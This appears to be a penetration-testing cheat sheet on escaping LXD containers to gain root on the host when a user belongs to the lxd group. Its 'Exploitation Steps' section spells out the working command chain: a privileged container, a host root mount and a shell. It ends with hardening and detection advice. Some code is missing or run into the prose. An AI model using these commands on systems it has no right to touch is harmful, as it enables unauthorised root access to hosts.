LXC Privilege Escalation Techniques
Check Group Membership
Check if the user is part of the lxd group, which may allow container escapes.
List Available LXC Images
View available LXC images for deployment.
List Available LXD Containers
Check running or existing LXD containers.
Import a Vulnerable LXC Image
Import a vulnerable LXC image for privilege escalation.
Initialize a Privileged LXC Container
Create a new privileged container that may allow access to the host.
Mount the Host's Root Filesystem into the Container
Bind the host's root filesystem inside the container.
Start the LXC Container
Execute a Shell Inside the Container
Gain access to the container's shell.
Access the Host's Root Filesystem from Inside the Container
Mount Host Root to a Running Container
If a container is already running, mount the host's root filesystem dynamically.
Execute a Shell in an Existing Container
Access the Host Root Filesystem
Check If a Container is Privileged
Determine if a container is running with elevated privileges.
List LXD Profiles
View existing LXD profiles that define container configurations.
Show the Configuration of a Given LXD Profile
Inspect the configuration of a specific profile.
Key Concepts:
Containers vs. VMs: You correctly highlighted the difference between OS-level virtualization (containers) and hardware-level virtualization (VMs).
LXC/LXD:
LXC: Application containers, sharing the host kernel.
LXD: System containers, running a complete OS.
Privilege Escalation: The primary goal is to escape the container and gain root access on the host system.
LXD Group: Membership in the
lxdorlxcgroup is often a prerequisite for exploiting LXD.Vulnerable Templates: Pre-existing container templates with weak security configurations (e.g., no passwords, privileged settings) are often the attack vector.
security.privileged=true: This is the critical setting that disables container isolation, allowing access to the host.Host Root Mounting: Mounting the host's root filesystem into the container allows direct access to host files.
Exploitation Steps (as described):
Check Group Membership:
idLocate Vulnerable Templates:
lsin relevant directories.Import the Image:
lxc image import ubuntu-template.tar.xz --alias ubuntutempList Images:
lxc image listInitialize a Privileged Container:
lxc init ubuntutemp privesc -c security.privileged=trueMount Host Root:
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=trueStart the Container:
lxc start privescExecute a Shell:
lxc exec privesc /bin/bashAccess Host Files:
ls -l /mnt/root
Important Considerations and Enhancements:
Security Best Practices:
Avoid using privileged containers unless absolutely necessary.
Use strong passwords for container images.
Regularly update container images.
Implement proper access controls.
Use namespaces and cgroups to further isolate containers.
Attack Vectors:
Besides vulnerable templates, other attack vectors include exploiting vulnerabilities in the LXD daemon itself or misconfigurations in container profiles.
Exploiting mounted volumes that are not the root directory.
Capabilities: Container escape can also happen by abusing linux capabilities.
Detection:
Monitor for unusual container activity.
Audit container configurations.
Use security tools to scan for vulnerabilities.
Containerization Security:
Understanding container security is crucial in modern IT environments.
Tools like Docker Bench for Security and Lynis can help assess container security.
Namespaces: Reinforce the importance of namespaces in container security.
Cgroups: Reinforce the importance of Cgroups in container security.
Real World Examples: Researching real world container escapes will help solidify understanding of the attack vectors.
LXD profiles: Understanding how LXD profiles work, and how they can be misconfigured is very important.
Last updated